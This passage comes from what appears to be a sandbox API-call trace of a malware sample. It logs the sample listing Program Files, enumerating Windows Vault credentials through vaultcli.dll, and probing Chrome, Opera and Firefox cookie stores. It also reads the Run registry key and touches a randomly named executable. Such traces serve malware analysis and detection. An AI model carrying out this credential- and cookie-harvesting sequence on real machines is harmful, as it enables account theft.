nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfca805db, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfca805db, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfc754db2, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfc754db2, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~2")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfca98c41, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfca98c41, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WINDOW~3")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x34108e1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x34108e1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Multimedia Platform", cAlternateFileName="WINDOW~4")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc93a39, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc93a39, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WI67CB~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcadbecb, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcadbecb, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WI8A19~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3436b38, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3436b38, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcaf1df1, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcaf1df1, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb2ee7f, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb2ee7f, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0169.534] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb2ee7f, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb2ee7f, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0169.535] FindClose (in: hFindFile=0x67f3f8 | out: hFindFile=0x67f3f8) returned 1 [0169.555] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x7333933, ftLastAccessTime.dwHighDateTime=0x1d7b06d, ftLastWriteTime.dwLowDateTime=0x7333933, ftLastWriteTime.dwHighDateTime=0x1d7b06d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x67f3f8 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x7333933, ftLastAccessTime.dwHighDateTime=0x1d7b06d, ftLastWriteTime.dwLowDateTime=0x7333933, ftLastWriteTime.dwHighDateTime=0x1d7b06d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xfcb0a4c3, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb0a4c3, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2f72013, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9701bb02, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9701bb02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcad7096, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcad7096, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b3095dc, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xfc778d3c, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfc778d3c, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 15", cAlternateFileName="MICROS~1")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde5c2433, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xfc75c352, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfc75c352, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde5c2433, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xfcb28d78, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb28d78, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf22b9950, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xfcb44e6c, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb44e6c, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0169.555] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb57329, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb57329, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ebef3a1, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0xfcb5d4e2, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb5d4e2, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WIA843~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb39e6c, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb39e6c, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~2")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd22e3e9, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd22e3e9, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WINDOW~3")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb1b6ba, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb1b6ba, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Multimedia Platform", cAlternateFileName="WINDOW~4")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb0082a, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb0082a, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WI67CB~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcae208f, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcae208f, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WI8A19~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcac99ab, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcac99ab, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfc7190a7, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfc7190a7, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2224dfa5, ftLastAccessTime.dwHighDateTime=0x1d70504, ftLastWriteTime.dwLowDateTime=0x2224dfa5, ftLastWriteTime.dwHighDateTime=0x1d70504, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsApps", cAlternateFileName="WI7DB9~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb4ea7e, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb4ea7e, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0169.556] FindNextFileW (in: hFindFile=0x67f3f8, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xfcb4ea7e, ftLastAccessTime.dwHighDateTime=0x1d7b06c, ftLastWriteTime.dwLowDateTime=0xfcb4ea7e, ftLastWriteTime.dwHighDateTime=0x1d7b06c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0169.556] FindClose (in: hFindFile=0x67f3f8 | out: hFindFile=0x67f3f8) returned 1 [0169.621] FindFirstFileW (in: lpFileName="D:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.631] FindFirstFileW (in: lpFileName="E:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.641] FindFirstFileW (in: lpFileName="F:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.688] FindFirstFileW (in: lpFileName="G:\\Program Files\\*", lpFindFileData=0xdd8c8 | out: lpFindFileData=0xdd8c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0169.688] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0xde784 | out: BaseAddress=0xde784*=0x6c660000) returned 0x0 [0170.935] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrv.ini", NtPathName=0xde654, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.010] NtCreateFile (in: FileHandle=0xde674, DesiredAccess=0x120089, ObjectAttributes=0xde63c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\4N7P3RR-\\4N7logrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde65c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde674*=0x0, IoStatusBlock=0xde65c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.011] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6eed28) returned 1 [0171.012] VaultEnumerateVaults () returned 0x0 [0171.021] VaultOpenVault () returned 0x0 [0171.022] VaultEnumerateItems () returned 0x0 [0171.024] VaultFree () returned 0x0 [0171.024] VaultCloseVault () returned 0x0 [0171.025] VaultOpenVault () returned 0x0 [0171.026] VaultEnumerateItems () returned 0x0 [0171.049] VaultFree () returned 0x0 [0171.049] VaultCloseVault () returned 0x0 [0171.051] VaultFree () returned 0x1 [0171.055] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde5a8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0171.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtPathName=0xde578, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.058] NtCreateFile (in: FileHandle=0xde598, DesiredAccess=0x120089, ObjectAttributes=0xde560*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde580, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde598*=0x0, IoStatusBlock=0xde580*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.058] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6e8d90) returned 1 [0171.058] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde534 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0171.058] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtPathName=0xde578, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.058] NtCreateFile (in: FileHandle=0xde598, DesiredAccess=0x120089, ObjectAttributes=0xde560*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Cookies", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde580, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde598*=0x0, IoStatusBlock=0xde580*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0171.067] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6e90d8) returned 1 [0171.068] RtlDosPathNameToNtPathName_U (in: DosPathName="\\Cookies.sqlite", NtPathName=0xde56c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Cookies.sqlite", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.068] NtCreateFile (in: FileHandle=0xde58c, DesiredAccess=0x120089, ObjectAttributes=0xde554*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Cookies.sqlite", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde574, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde58c*=0x0, IoStatusBlock=0xde574*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0171.068] RtlFreeHeap (HeapHandle=0x670000, Flags=0x0, BaseAddress=0x6d7f00) returned 1 [0171.093] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x270) returned 0x0 [0171.093] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0171.093] NtClose (Handle=0x270) returned 0x0 [0171.093] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0xde820, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0171.093] NtCreateFile (in: FileHandle=0xde840, DesiredAccess=0x120089, ObjectAttributes=0xde808*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), 